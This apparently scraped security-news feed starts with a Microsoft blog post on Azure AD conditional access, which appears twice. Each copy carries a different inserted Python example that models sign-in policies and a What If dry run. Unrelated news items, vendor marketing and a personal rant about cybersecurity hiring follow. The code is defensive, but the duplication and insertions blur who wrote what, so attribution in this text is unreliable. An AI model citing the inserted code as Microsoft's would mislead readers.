Step 4. Set conditional access policies: top 10 actions to secure your environment

The Top 10 actions to secure your environment series outlines fundamental steps you can take with your investment in Microsoft 365 security solutions. In Step 4. Set conditional access policies, you'll learn how to control access to your apps and corporate resources using conditional access policies, and how these policies can block legacy authentication methods and control access to SaaS apps.

In today's workplace, users can work from anywhere, on any device. Whether using a company-provided laptop at the office, working from home, traveling for business, or using a personal mobile phone, employees expect to seamlessly access what they need to get work done. While the need for productivity may not change with circumstances, the level of risk of each sign-in does. Not all devices, apps, or networks are equally secure, and hackers will exploit any vulnerability that will give them access to your users and resources. It is critical to safeguard your identities, but it is not enough. You also need flexible security policies that are responsive to conditions.

Set up Azure Active Directory (Azure AD) conditional access policies

Azure AD conditional access lets you apply security policies that are triggered automatically when certain conditions are met. You can block access if the data suggests the user has been compromised or if it's highly unlikely that the user would sign in under those conditions. You can enforce additional authentication requirements when the system detects a medium risk based on the sign-in conditions (see “Sign-in risk” below).

We recommend that you apply policies that are appropriate for your organization for the following conditions:

  • Users and user groups: To reduce the risk that sensitive data is leaked, define which users or user groups can access which applications or resources, paying careful attention to sources of highly sensitive information such as human resources or financial data.
  • Sign-in risk: Azure AD machine learning algorithms evaluate every sign-in and give it a risk score of low, medium, or high depending on how likely it is that someone other than the legitimate owner of the account is attempting to sign in. Anyone with a medium risk should be challenged with Multi-Factor Authentication (MFA) at sign-in. If the sign-in is a high risk, access should be blocked. This condition requires Azure AD Identity Protection, which you can read about in Step 3. Protect your identities.
  • Location: A location can be risky if it's in a country with limited security policies, if the wireless network is unsecured, or simply because it's not a location where the organization typically does business. You can modify access requirements for sign-ins from locations that are not on an IP safe list (named locations marked as trusted) or that are risky for other reasons. Users accessing a service from off the corporate network should be required to use MFA.
  • Device platform: For this condition, define a policy for each device platform that either blocks access, requires compliance with Microsoft Intune policies, or requires the device be domain joined.
  • Device state: Use this condition to define policies for unmanaged devices.
  • Client apps: Users can access many cloud apps using different app types such as web-based apps, mobile apps, or desktop apps. You can apply security policies if an access attempt is performed using a client app type that causes known issues, or you can require that only managed devices access certain app types.
  • Cloud apps: This condition specifies unique policies for sensitive apps. For example, you can require that HR apps like Workday are blocked if Azure AD detects a risky sign-in or if a user tries to access it with an unmanaged device.

When a condition is met, you can choose what policy Azure AD will enforce:

  • Require MFA to prove identity.
  • Change the actions the user can take in cloud apps.
  • Restrict access to sensitive data (for example: limit downloads or sharing functionality).
  • Require a password reset.
  • Block access.

Once set, these policies will apply automatically without any manual intervention (Figure 1).

Figure 1. Azure AD automatically applies the policies you set based on condition.

Block legacy authentication and control access to highly privileged accounts

Old apps that use a legacy authentication method, such as POP3, IMAP4, or SMTP clients, can increase your risk because they prevent Azure AD from doing an advanced security assessment and don't allow more modern forms of authentication, such as MFA. Because these protocols authenticate with nothing more than a username and password, they are also the usual target of password-spray attacks. We recommend you use client application conditional access rules (Figure 2) to block these apps entirely.

Figure 2. Apply conditional access rules to block client apps using legacy authentication methods.

You can also use conditional access rules to reduce the risk that highly privileged accounts or service accounts are compromised. For example, if your HR system uses a service account to access the email account, you can make sure it can only run against the service from a specific IP at the appropriate time of day.

Enhance conditional access with Intune and Microsoft Cloud App Security

Azure AD integrates with Intune, so that conditional access policies can consider the Intune device state as part of the policy, letting you set access controls for devices that have old operating systems or other security vulnerabilities. You can also use conditional access in Intune to make sure that only apps managed by Intune can access corporate email or other Office 365 services. Azure AD will enforce these rules.

Cloud App Security Conditional Access App Control extends conditional access to your SaaS apps. You can block downloads from apps, limit activities in the app, monitor risky users, or block access to the app entirely.

Once you have policies in place, we recommend that you use the Azure AD What If tool to simulate possible sign-in scenarios that your users may confront. The What If tool allows you to select a user, the app that user is trying to access, and the conditions of that sign-in to see which policies will apply. (Figure 3.) This step will give you a better sense of how your policies will impact your users. You can also check what policies do not apply to a specific scenario.

One final precaution: be sure to exclude an emergency-access (“break glass”) group from each conditional access policy, so you don't lock yourself out.

Figure 3. The Azure AD What If tool gives you a better sense of how your policies will impact your users.
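The policies recommended above (block legacy authentication, block high-risk sign-ins, require MFA for medium-risk sign-ins and for sign-ins outside trusted locations), expressed as code, with a What If-style dry run and a check for the exception-group precaution. This is an added example, not Microsoft's code: the policy dictionaries follow the Microsoft Graph `conditionalAccessPolicy` shape, the evaluator is a deliberately simplified model of Azure AD's engine (a block wins; otherwise every matching policy's grant controls must be satisfied), the break-glass group ID is a placeholder, and the sample sign-ins are constructed.

```python
"""Conditional access as code plus a What If-style dry run.

Added example, not Microsoft's code. Policy dicts follow the Graph
conditionalAccessPolicy schema; the evaluator is a simplified model.
"""
import json

# Placeholder object ID of the emergency-access ("break glass") group.
# Every policy excludes it so one bad policy cannot lock every admin out.
BREAK_GLASS_GROUP = "00000000-0000-0000-0000-00000000beef"


def policy(name, conditions, controls, state="enabled"):
    """Build one Graph-style policy. Pilot with
    state='enabledForReportingButNotEnforced' (report-only) before enforcing."""
    users = conditions.setdefault("users", {})
    users.setdefault("includeUsers", ["All"])
    users.setdefault("excludeGroups", []).append(BREAK_GLASS_GROUP)
    conditions.setdefault("applications", {"includeApplications": ["All"]})
    conditions.setdefault("clientAppTypes", ["all"])
    return {
        "displayName": name,
        "state": state,
        "conditions": conditions,
        "grantControls": {"operator": "OR", "builtInControls": list(controls)},
    }


POLICIES = [
    # POP3/IMAP4/SMTP and basic-auth ActiveSync clients cannot do MFA.
    policy("Block legacy authentication",
           {"clientAppTypes": ["exchangeActiveSync", "other"]}, ["block"]),
    policy("Block high-risk sign-ins", {"signInRiskLevels": ["high"]}, ["block"]),
    policy("Require MFA for medium-risk sign-ins",
           {"signInRiskLevels": ["medium"]}, ["mfa"]),
    # "AllTrusted" = named locations marked trusted (the corporate IP safe list).
    policy("Require MFA outside trusted locations",
           {"locations": {"includeLocations": ["All"],
                          "excludeLocations": ["AllTrusted"]}}, ["mfa"]),
]


def matches(pol, signin):
    """Does this policy apply to the sign-in? Each condition narrows scope."""
    c, u = pol["conditions"], pol["conditions"]["users"]
    groups = set(signin["groups"])
    if signin["user"] in u.get("excludeUsers", []):
        return False
    if groups & set(u.get("excludeGroups", [])):
        return False
    included = ("All" in u["includeUsers"] or signin["user"] in u["includeUsers"]
                or bool(groups & set(u.get("includeGroups", []))))
    if not included:
        return False
    if "all" not in c["clientAppTypes"] and signin["client_app"] not in c["clientAppTypes"]:
        return False
    if c.get("signInRiskLevels") and signin["risk"] not in c["signInRiskLevels"]:
        return False
    loc = c.get("locations", {})
    if signin["trusted_location"] and "AllTrusted" in loc.get("excludeLocations", []):
        return False
    return True


def what_if(signin, policies=POLICIES):
    """Dry run: which policies match and what the user would face."""
    matched = [p for p in policies if matches(p, signin)]
    controls = {ctl for p in matched for ctl in p["grantControls"]["builtInControls"]}
    if "block" in controls:
        decision = "block"
    elif controls:
        decision = "+".join(sorted(controls))
    else:
        decision = "allow"
    return {"decision": decision, "matched": [p["displayName"] for p in matched]}


def lockout_risks(policies, breakglass=BREAK_GLASS_GROUP):
    """Names of policies that do not exclude the emergency-access group."""
    return [p["displayName"] for p in policies
            if breakglass not in p["conditions"]["users"].get("excludeGroups", [])]


def to_graph_json(pol):
    """Request body for POST /v1.0/identity/conditionalAccess/policies."""
    return json.dumps(pol, indent=2)


# Constructed sample sign-ins for the dry run (not real telemetry).
SIGN_INS = {
    "imap_client_on_lan": dict(user="alice", groups=[], client_app="other",
                               risk="none", trusted_location=True),
    "browser_from_home_medium_risk": dict(user="alice", groups=[], client_app="browser",
                                          risk="medium", trusted_location=False),
    "breakglass_high_risk": dict(user="bg-admin", groups=[BREAK_GLASS_GROUP],
                                 client_app="browser", risk="high", trusted_location=False),
}

if __name__ == "__main__":
    for name, s in SIGN_INS.items():
        print(f"{name:32} -> {what_if(s)}")
    print("policies missing the break-glass exclusion:", lockout_risks(POLICIES))
```

`to_graph_json` produces a body you can POST to `https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies` with the `Policy.ReadWrite.ConditionalAccess` permission; run `lockout_risks` over every policy before doing so, and deploy in report-only state first so the real What If tool and sign-in logs can confirm the dry run.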

Learn more

Check back in a few weeks for our next blog post, Step 5. Set up mobile device management, where we'll dive into how to plan your Intune deployment and set up mobile device management as part of your Unified Endpoint Management strategy.

Get deployment help now

FastTrack for Microsoft 365 provides end-to-end guidance to set up your security products. FastTrack is a deployment and adoption service that comes at no charge with your subscription. Get started at FastTrack for Microsoft 365.

The post Step 4. Set conditional access policies: top 10 actions to secure your environment appeared first on Microsoft Secure.

Microsoft Secure: Step 4. Set conditional access policies: top 10 actions to secure your environment

The Top 10 actions to secure your environment series outlines fundamental steps you can take with your investment in Microsoft 365 security solutions. In Step 4. Set conditional access policies, youll learn how to control access to your apps and corporate resources using conditional access policies, and how these policies can block legacy authentication methods and control access to SaaS apps.

In todays workplace, users can work from anywhere, on any device. Whether using a company-provided laptop at the office, working from home, traveling for business, or using a personal mobile phone, employees expect to seamlessly access what they need to get work done. While the need for productivity may not change with circumstances, the level of risk of each sign-in does. Not all devices, apps, or networks are equally secure, and hackers will exploit any vulnerability that will give them access to your users and resources. It is critical to safeguard your identities, but it is not enough. You also need flexible security policies that are responsive to conditions.

Set up Azure Active Directory (Azure AD) conditional access policies

Azure AD conditional access lets you apply security policies that are triggered automatically when certain conditions are met. You can block access if the data suggests the user has been compromised or if its highly unlikely that the user would sign in under those conditions. You can enforce additional authentication requirements when the system detects a medium risk based on the sign-in conditions (see “Sign-in risk” below).

We recommend that you apply polices that are appropriate for your organization for the following conditions:

  • Users and user groups: To reduce the risk that sensitive data is leaked, define which users or user groups can access which applications or resources, paying careful attention to sources of highly sensitive information such as human resources or financial data.
  • Sign-in risk: Azure AD machine learning algorithms evaluate every sign-in and give it a risk score of low, medium, or high depending on how likely it is that someone other than the legitimate owner of the account is attempting to sign in. Anyone with a medium risk should be challenged with Multi-Factor Authentication (MFA) at sign-in. If the sign-in is a high risk, access should be blocked. This condition requires Azure AD Identity Protection, which you can read about in Step 3. Protect your identities.
  • Location: A location can be risky if it's in a country with limited security policies, if the wireless network is unsecured, or simply because it's not a location where the organization typically does business. You can modify access requirements for sign-ins from locations that are not on an IP safe list or that are risky for other reasons. Users accessing a service when they're off the corporate network should be required to use MFA.
  • Device platform: For this condition, define a policy for each device platform that either blocks access, requires compliance with Microsoft Intune policies, or requires the device be domain joined.
  • Device state: Use this condition to define policies for unmanaged devices.
  • Client apps: Users can access many cloud apps using different app types such as web-based apps, mobile apps, or desktop apps. You can apply security policies if an access attempt is performed using a client app type that causes known issues, or you can require that only managed devices access certain app types.
  • Cloud apps: This condition specifies unique policies for sensitive apps. For example, you can require that HR apps like Workday are blocked if Azure AD detects a risky sign-in or if a user tries to access it with an unmanaged device.

When a condition is met, you can choose what policy Azure AD will enforce:

  • Require MFA to prove identity.
  • Change the actions the user can take in cloud apps.
  • Restrict access to sensitive data (for example: limit downloads or sharing functionality).
  • Require a password reset.
  • Block access.

Once set, these policies will apply automatically without any manual intervention (Figure 1).

Figure 1. Azure AD automatically applies the policies you set based on condition.

Block legacy authentication and control access to highly privileged accounts

Old apps that use a legacy authentication method, such as POP3, IMAP4, or SMTP clients, can increase your risk because they prevent Azure AD from doing an advanced security assessment and don't allow more modern forms of authentication, such as MFA. We recommend you use client application conditional access rules (Figure 2) to block these apps entirely.

Figure 2. Apply conditional access rules to block client apps using legacy authentication methods.

You can also use conditional access rules to reduce the risk that highly privileged accounts or service accounts are compromised. For example, if your HR system uses a service account to access the email account, you can make sure it can only run against the service from a specific IP at the appropriate time of day.

Enhance conditional access with Intune and Microsoft Cloud App Security

Azure AD integrates with Intune, so that conditional access policies can consider the Intune device state as part of the policy, letting you set access controls for devices that have old operating systems or other security vulnerabilities. You can also use conditional access in Intune to make sure that only apps managed by Intune can access corporate email or other Office 365 services. Azure AD will enforce these rules.

Cloud App Security Conditional Access App Control extends conditional access to your SaaS apps. You can block downloads from apps, limit activities in the app, monitor risky users, or block access to the app entirely.

Once you have policies in place, we recommend that you use the Azure AD What If tool to simulate possible sign-in scenarios that your users may confront. The What If tool allows you to select a user, the app that user is trying to access, and the conditions of that sign-in to see which policies will apply. (Figure 3.) This step will give you a better sense of how your policies will impact your users. You can also check what policies do not apply to a specific scenario.

One final precaution: Be sure to set up an exception group for each conditional access policy, so you don't lock yourself out.
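To make the evaluation concrete, here is an added example (not code from the Microsoft post, and not Azure AD's own engine) that expresses the policies recommended above, including the legacy-authentication block, in the shape of the Microsoft Graph conditionalAccessPolicy resource and runs a small What If style evaluation over constructed sign-in scenarios. The group id, the HR app id, the user names and the scenarios are placeholders I constructed; the evaluator models only the built-in All / AllTrusted location selectors and combines policies the way the post describes (any blocking policy wins, otherwise every required control accumulates). It also includes a check for the final precaution: every policy must exclude the exception group.

```python
"""Model Azure AD conditional access policies (Graph-style dicts) and run What If scenarios.
Illustrative only: simplified evaluation, constructed ids and scenarios."""
from dataclasses import dataclass

BREAK_GLASS_GROUP = "00000000-0000-0000-0000-00000000beef"  # placeholder id of the exception group
HR_APP = "workday-app-id-placeholder"                        # placeholder application id


def policy(name, grant, **conditions):
    """Build a Graph-style policy. Every policy excludes the exception group by default."""
    cond = {"users": {"includeUsers": ["All"], "excludeGroups": [BREAK_GLASS_GROUP]},
            "applications": {"includeApplications": ["All"]},
            "clientAppTypes": ["all"]}
    cond.update(conditions)
    return {"displayName": name, "state": "enabled", "conditions": cond,
            "grantControls": {"operator": "OR", "builtInControls": [grant]}}


POLICIES = [
    # POP3/IMAP4/SMTP clients show up as the "other" client app type
    policy("CA01 Block legacy authentication", "block",
           clientAppTypes=["exchangeActiveSync", "other"]),
    policy("CA02 Medium sign-in risk requires MFA", "mfa", signInRiskLevels=["medium"]),
    policy("CA03 Block high sign-in risk", "block", signInRiskLevels=["high"]),
    policy("CA04 MFA outside trusted locations", "mfa",
           locations={"includeLocations": ["All"], "excludeLocations": ["AllTrusted"]}),
    policy("CA05 HR app requires compliant device", "compliantDevice",
           applications={"includeApplications": [HR_APP]}),
]


@dataclass
class SignIn:
    user: str
    groups: frozenset
    app: str
    risk: str = "none"            # Identity Protection score: none/low/medium/high
    client_app: str = "browser"   # browser/mobileAppsAndDesktopClients/exchangeActiveSync/other
    trusted_location: bool = True


def policy_applies(p, s):
    """True when every condition of policy p matches sign-in s."""
    c = p["conditions"]
    u = c["users"]
    if s.user in u.get("excludeUsers", []) or s.groups & set(u.get("excludeGroups", [])):
        return False
    inc_users, inc_groups = u.get("includeUsers", []), u.get("includeGroups", [])
    if "All" not in inc_users and s.user not in inc_users and not s.groups & set(inc_groups):
        return False
    apps = c["applications"]
    if s.app in apps.get("excludeApplications", []):
        return False
    if "All" not in apps["includeApplications"] and s.app not in apps["includeApplications"]:
        return False
    if "all" not in c["clientAppTypes"] and s.client_app not in c["clientAppTypes"]:
        return False
    if c.get("signInRiskLevels") and s.risk not in c["signInRiskLevels"]:
        return False
    loc = c.get("locations")
    if loc:  # only the built-in "All" / "AllTrusted" selectors are modelled
        if "AllTrusted" in loc.get("includeLocations", []) and not s.trusted_location:
            return False
        if "AllTrusted" in loc.get("excludeLocations", []) and s.trusted_location:
            return False
    return True


def what_if(s, policies=POLICIES):
    """Return (names of applying policies, union of required controls, blocked?)."""
    applied = [p for p in policies if p["state"] == "enabled" and policy_applies(p, s)]
    controls = set()
    for p in applied:
        controls.update(p["grantControls"]["builtInControls"])
    return [p["displayName"] for p in applied], controls, "block" in controls


def policies_without_exception_group(policies=POLICIES, group=BREAK_GLASS_GROUP):
    """Lock-out check: list policies that do not exclude the exception group."""
    return [p["displayName"] for p in policies
            if group not in p["conditions"]["users"].get("excludeGroups", [])]


if __name__ == "__main__":
    scenarios = {  # constructed scenarios
        "IMAP client on the corporate network": SignIn("alice@contoso.example", frozenset({"grp-finance"}), "Exchange Online", client_app="other"),
        "medium risk from hotel Wi-Fi": SignIn("alice@contoso.example", frozenset({"grp-finance"}), "SharePoint Online", risk="medium", trusted_location=False),
        "HR app from home": SignIn("bob@contoso.example", frozenset({"grp-hr"}), HR_APP, trusted_location=False),
        "break-glass admin, legacy client off-network": SignIn("breakglass@contoso.example", frozenset({BREAK_GLASS_GROUP}), "Exchange Online", client_app="other", trusted_location=False),
    }
    for label, s in scenarios.items():
        print(label, "->", what_if(s))
    print("policies missing the exception group:", policies_without_exception_group())
```

The evaluator is deliberately narrow (no named IP locations, device platform or device-state conditions), but the shape of the policy dicts matches what the Graph API accepts, so a practitioner can lift them into a real tenant and compare the tool's output with the console What If results.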

Figure 3. The Azure AD What If tool gives you a better sense of how your policies will impact your users.

Learn more

Check back in a few weeks for our next blog post, Step 5. Set up mobile device management, where we'll dive into how to plan your Intune deployment and set up mobile device management as part of your Unified Endpoint Management strategy.

Get deployment help now

FastTrack for Microsoft 365 provides end-to-end guidance to set up your security products. FastTrack is a deployment and adoption service that comes at no charge with your subscription. Get started at FastTrack for Microsoft 365.

The post Step 4. Set conditional access policies: top 10 actions to secure your environment appeared first on Microsoft Secure.

The biggest cybersecurity challenge? Communicating threats internally

IT executives responsible for cybersecurity feel a lack of support from company leaders, and 33 percent feel completely isolated in their role, according to Trend Micro. IT teams are under significant pressure, with some of the challenges cited including prioritizing emerging threats (47 percent) and keeping track of a fractured security environment (43 percent). The survey showed that they are feeling the weight of this responsibility, with many (34 percent) stating that the burden they … More

The post The biggest cybersecurity challenge? Communicating threats internally appeared first on Help Net Security.

$1.7 billion in cryptocurrency was stolen and scammed in 2018

$1.7 billion in cryptocurrency was stolen and scammed in 2018 — a dramatic rise in criminal activity despite a slump in the market, according to CipherTrace. Criminals need to launder all these funds in order to cash out before a wave of regulations go into effect in 2019. Theft from cryptocurrency exchanges accounted for the majority of the criminal activity: more than $950 million was stolen in 2018, representing 3.6 times more than in 2017. … More

The post $1.7 billion in cryptocurrency was stolen and scammed in 2018 appeared first on Help Net Security.

Meet the New Imperva – Defending Your Business Growth Today and Tomorrow

Today’s Imperva is a champion in the fight to secure data and applications, wherever they reside. The threat landscape is dangerous and ever-changing, but our thousands of customers know they can count on Imperva to protect them. No wonder our solutions are recognized as leaders by analysts such as Gartner and Forrester Research.  

However, security is changing. It's no longer just about protecting your company's digital assets. It's also about protecting your employees, partners, customers, and all of their applications, data, APIs, microservices, and even IoT devices. Millions of interactions occur every day that drive business value, and revenue.

Within this vast new universe, traditional lockdown security approaches just don’t cut it anymore. They’re too rigid, create their own security gaps, and stifle your business. What you need is a security posture that assumes an open exchange between data, applications and users. To do that successfully, you need greater visibility into all your digital systems, whether on-premises or in the cloud, so you can quickly pinpoint the threats that matter. You also need agility to adapt to fast-changing DevOps environments. And you need resilient systems that not only prevent data breaches and DDoS attacks but can also recover quickly, too.

In short, your business’s security needs are evolving. Which is why Imperva is also evolving, in order to remain the defender of your business growth, so you never have to choose between innovating for your customers and protecting what matters.

This year, we’ll be launching major expansions to our data and application security solutions. We’re also boosting the visibility delivered by them, distilling millions of data points so that you have actionable insights and the ability to automate the responses that protect your business.

To make it easier for you to focus on your business, we’re also simplifying how we bring our products to market, from the naming, to the packaging, to the pricing. Through a subscription model we call FlexProtect, enterprises can deploy Imperva solutions how and when you need them, in order to quickly gain the protection you need.

This year, Imperva will also be introducing useful new research and thought leadership to help your organization get smarter and respond to threats faster. Additionally, we are committed to making your experience with our brand and products even better. We are introducing an all-new look and feel, which you can check out today starting with our website, the new Imperva.com!

Doing business today has never been more potentially rewarding – or challenging. Security providers need to be up to the task. That’s why Imperva is evolving. We do more than simply guard your data and apps. We’ll help you anticipate real threats, minimize the business impact of any incidents, and build customer trust – all without overstretching limited resources. As your own business evolves, so does Imperva, so we can remain your defender and help you realize your growth ambitions, today and tomorrow.

Imperva

Protect the pulse of your business.

The post Meet the New Imperva – Defending Your Business Growth Today and Tomorrow appeared first on Blog.

How privacy and security concerns affect password practices

Yubico announced the results of the company’s 2019 State of Password and Authentication Security Behaviors Report, conducted by the Ponemon Institute, who surveyed 1,761 IT and IT security practitioners in the United States, United Kingdom, Germany and France. Understanding behavior The purpose of this study is to understand the beliefs and behaviors surrounding password management and authentication practices for individuals both in the workplace and at home. The goal was to understand if these beliefs … More

The post How privacy and security concerns affect password practices appeared first on Help Net Security.

Pros & Cons of a Career in Cybersecurity

Cybersecurity is becoming an increasingly popular career choice. Why, you wonder? Read below to find out what InfoSec professionals say are the pros and cons of a career in this field.

Sources: IT Governance, Beyond Trust, Quora

Aspiring to learn modern penetration testing skills and techniques? Check out our Penetration Testing Professional (PTP) training course, or get your free trial below.
What steps consumers need to take to protect themselves online

Yesterday was Data Privacy Day, so McAfee warned consumers that cybercriminals are continuing to access personal information through weak passwords, phishing emails, connected things, malicious apps and unsecure Wi-Fi networks. Weak Passwords Consumers often pick simple passwords for the multiple accounts they use daily, not realizing that choosing weak passwords can open the door to identity theft and identity. Tip: Use strong passwords that include uppercase and lowercase letters, numbers and symbols. Don’t use the … More

The post What steps consumers need to take to protect themselves online appeared first on Help Net Security.

A Shortage in Common Sense: The Myth of the Talent Gap

I have a visceral reaction every time I encounter yet another article bemoaning the so-called "talent gap" or "labor gap" in cybersecurity. Having been in and out of the job market several times over the past decade (for better and, more often, for worse), I can honestly say this is utter nonsense. The roots of this clamor began more than a decade ago in DC as federal agencies grappled with modernizing, making use of the annual Sept/Oct budget season to decry how poor and helpless they were in order to justify demands for ever-increasing budgets. Local universities (such as UMUC) quickly caught on to the marketing plan and rapidly launched a cybersecurity degree program. Meanwhile, ISC2 helped ensure that the CISSP was a mandatory component for hiring in many positions.

While I am still in the midst of a job search (one that's a year old at this point), I find I need to speak out on the recent TechCrunch OpEd piece "Too few cybersecurity professionals is a gigantic problem for 2019" in order to address some of the nonsensical statements made that really have no business being taken seriously. The author does get a couple things right, but not enough to compensate for perpetuating many myths that need to be put to rest.

Allow me to start by addressing some sound-bites from the piece:

"Seasoned cyber pros typically earn $95,000 a year, often markedly more, and yet job openings can linger almost indefinitely. The ever-leaner cybersecurity workforce makes many companies desperate for help."

There are several reasons why positions often sit open for long periods of time: they require an existing clearance; hiring managers are obtusely fixated on experience with a very narrow list of tools (a tool is a tool is a tool!); recruiters aren't even passing resumes along to hiring managers, often because of a failure to find keywords, sometimes because of useless biases (e.g., I've had several short stints due to layoffs and projects being terminated - outside my control! - which is used to rule me out), or just as often because they don't have the first clue what they're looking for; positions are requiring "experience" with far too many things; the interview process focuses too much on tool fit rather than people fit, including failing to evaluate attitude, aptitude, and adaptability.

The bottom line here is this: if you see a position that's been open a long time, then that's a red flag. Something is broken in the hiring process. There are literally thousands (likely tens of thousands) of quality candidates on the market today with varying degrees of experience all trying to find work, and yet we cannot land these positions because of arbitrary requirements.

Oh, and by the way, one of those arbitrary requirements is geographical. If you have 2 or more offices in separate geographic areas, then you have an implicit "remote worker" policy, because a certain percentage of your workforce is working in a location separate from your primary HQ. Not everyone wants to live in big cities. Not everyone wants to move to key tech "capitals" like Silicon Valley or Austin, TX, or Seattle or NYC or DC or Boston. Those places are all expensive (in some cases very expensive) and, especially for junior hires, completely inaccessible financially. It is beyond time to support remote workers and introduce flexibility into the workplace. It's ironic that in 1998-2001, when there was also allegedly a labor shortage, companies were willing to do far more things to attract and retain talent. All of that has gone away since the recession in 2009. It's time to wake up and change.

"Between September 2017 and August 2018, U.S. employers posted nearly 314,000 jobs for cybersecurity pros."

Posting a job with "cybersecurity" (or comparable) in a title or description is a far cry from the position actually being oriented to cybersecurity. This is a situation that has worsened in the last few years. I encounter numerous "cybersecurity" roles that have little-to-nothing to do with cybersecurity. For example, it's very common to find "DevSecOps" positions that are acutely focused on DevOps automation. Or, sometimes they're just recast application security roles that got a trendy bump to "DevSecOps." Similarly, the "security architect" title has become a veritable grab bag of random terms, tools, and duties, and can be anything from a SOC analyst to hands-on engineer to manager to developer and so on.

Authors of job postings are really doing themselves and the labor pool a major disservice by failing to write clear, concise, accurate job postings. It's very common to encounter posts that list everything but the kitchen sink, not because they need actual direct experience with everything under the sun, but because they aspirationally believe that some day they might need those skills, or, worse, because they really need to hire 5 people, but only got approval for 1 slot, and so they try to find a mythological being who's expert in secure coding, appsec, netsec, cloud security, container security, traditional infrastructure, cloud infrastructure, divination, unicorn taming, and budget mastery. Worse, they then start out interviews by asking if the candidate has experience with a handful of tools, and failing that, either drop the candidate (because oooOOOOooo there's magic in big security vendor tools) or force them to continue through a process that reveals an increasingly bad fit.

And now, the kicker: You shouldn't be hiring this many security people anyway! There's a delicious irony to being interviewed for a dedicated and growing cybersecurity team/program that espouses "build security in" ideology. If your org is really so interested in building security into everything, then quit trying to create massive cybersecurity teams/programs that only lead to failed old enablement practices and "otherness" that actually alienates your internal clients and decreases security. But I digress...

"Companies are trying to cope in part by relying more aggressively on artificial intelligence and machine learning, but this is still at a relatively nascent stage and can never do more than mitigate the problem."

First, never say never, m'kay? That's just silly. Second, while vendors are aggressively pushing AI/ML solutions, most of it isn't even AI or ML (it's amazing how many products are just elaborate regex schemes under the hood!). The phrase "snake oil" comes to mind. Third - and this is very important! - the focus should absolutely, positively be on automation and orchestration today. There are tons of things that can be automated, and there is a growing pool of reasonably qualified candidates with experience using generic A&O tools (e.g., ansible, puppet, chef, etc.).

The key takeaway here is this: AI/ML is an easy target for throwing stones, but the comment obscures an important lesson, which is that organizations are not doing enough with automation and orchestration, especially as it pertains to security. This reality needs to be remedied ASAP!

"These are ideal candidates, but, in fact, the backgrounds of budding cyber pros need not be nearly this good."

There is no perfect, and perfect is the enemy of good. Hiring managers, HR, and recruiters: pay attention! You. Should. Be. Hiring. For. People. Fit. And. Aptitude. FULL STOP. If you're having trouble "finding good candidates," then YOU ARE THE PROBLEM. I could rant endlessly on this point, but won't. Introspection, please.

"Almost no cybersecurity pro over 30 today has a degree in cybersecurity and many don't even have degrees in computer science."

Mmmmmmmmmmaaaaybe. I'm over 30. I have an undergrad in CompSci. I have a Master's degree in Engineering Mgmt with a concentration in InfoSec Mgmt. Also, the older millennials are now hitting their 30s. Cybersecurity (or comparable) degrees have been around for 15+ years. This statement is in many ways demonstrably false, but more importantly IT DOESN'T MATTER ONE BIT!

The problem, again, is with the hiring process, including having arbitrary "requirements" that artificially shrink the labor pool (which is the point the author seems to be making here). QUIT HIRING BASED ON A PUNCH LIST! Sing it with me: attitude, aptitude, and adaptability! These are the key qualities you should be seeking in the majority of hires.

Here's a perfect example: I interviewed in mid-2018 for a "security architect" role that had been open for a very long time (red flag!). When I hopped on what I thought was a quick intro call with the hiring manager, I was instead met with the hiring manager and 2 reports (red flag!). The 2 reports gushed over how awesome the hiring manager was to work for (odd), and then they launched into questions. Every single question was about hadoop security, even though the first question they asked was "do you have extensive experience securing hadoop?" to which I answered "none, really, but it's just a NOSQL data store, so *shrug*." Moreover, the hiring manager was a total jerk on the call (not sure if this was being done as a stress test tactic or because the guy was just a jerk). I would be asked a question, I would start to answer (literally, I'd just get a couple words out of my mouth, like "Well, for starters...") and the hiring manager would jump in, tell me my answer was insufficient (I hadn't even answered yet!), and then demand I "get to the point." Suffice to say, I cut the interview off and then provided strong feedback to the third-party recruiter to run away.

There are 2 lessons from this experience: 1) The job description (JD) was completely and wholly inadequate. While it mentioned hadoop experience as a requirement, it became immediately clear that they didn't so much want a security architect as they wanted a hadoop expert (go get a contractor - sheesh!). 2) Don't be jerks to candidates! If that hiring manager is allowed to exist and persist within that organization, then that is absolutely not a place I would ever consider working (and have avoided applying or being submitted there ever since).

Key takeaways: If you're having trouble finding candidates, make sure the JD is accurate, and make sure your hiring manager is doing a good job representing the company. It's still a small industry and many of us talk and share stories. Wanna kill your applicant pool? Become known as a horrible place to work that's filled with belligerents and "brilliant jerks." I'm a big fan of Reed Hastings' (Netflix) "no brilliant jerks" policy. Hugely and most biggestly important.

"Asking too much from prospective pros isn't the only reason behind the severe cyber manpower shortage."

Perhaps not, but it's a major factor in hiring decisions. If you cannot offer any semblance of work-life balance, especially for your experienced hires who may very well have families, then you need to re-evaluate your org culture. Moreover, organizations must immediately stop trying to hire single resources to fill 5 different roles. These candidates are rare, if they exist at all, and it's killing your hiring process. More importantly, it means you don't actually know your priorities, AND... it says you're not willing to invest in your people to help them develop into the retainable talent you so desperately need. Once again, it's time for some serious introspection here!

"One key finding was that 43% of those polled said their organization provides inadequate security training resources, heightening the possibility of a breach."

Ya gotta love the orthogonal throw-away quip... this comment has nothing to do with the "labor gap," nor is it about the challenges of tech hiring. This point actually pertains directly to organizational culture. At face, it's true, insomuch as organizations tend to over-rely on annual security (and privacy) training, among other things. However, what it really reflects is a huge problem with pretty much all organizations in that they don't really make security a priority, they don't make it a shared responsibility, and they don't hire the right people in HR, org dev, or security to help executive leadership transform org culture in a favorable and necessary manner.

"IBM, for example, creates what it calls "new collar" jobs, which prioritize skills, knowledge and willingness to learn over degrees."

"Technology companies still must work much harder to broaden their range of potential candidates, seeking smart, motivated and dedicated individuals who would be good teammates."

To close on something a bit more positive, I very much agree with and appreciate these points. But, again, this is all about organizations needing to fix themselves, and ASAP at that. If you think hiring for a cybersecurity role is purely about running down a list of arbitrary "requirements" and only accepting candidates who meet all (or most) of them, then you're failing. I've mentioned it several times throughout my post here, and I'll say it once again: Hire for attitude, aptitude, and adaptability!!! If you don't know how to do this, then get educated and fix your hiring process.

The analogy I've used of late is this: A car repair shop does not hire a mechanic simply because they know how to use metric vs. standard/imperial wrenches. No sane person would say "oh, I'm sorry, you only know how to use wrenches in millimeter sizes, but we need someone who can use a wrench in fractions of inches." Think about that for a second! How insane would that be?! And yet... this is exactly how the vast majority of orgs are trying to hire tech talent. "Oh, I'm sorry, you've worked with Symantec, but not McAfee or Trend? We need someone experienced with those other brands." Or, "Oh, we're a Rapid7 shop here, so I don't see how your Tenable (or Qualys) experience really applies." Or, "When were you last 'hands-on' in a role? Oh, I see, it's been a few years? Well, thanks for your time..." Etc. Etc. Etc.

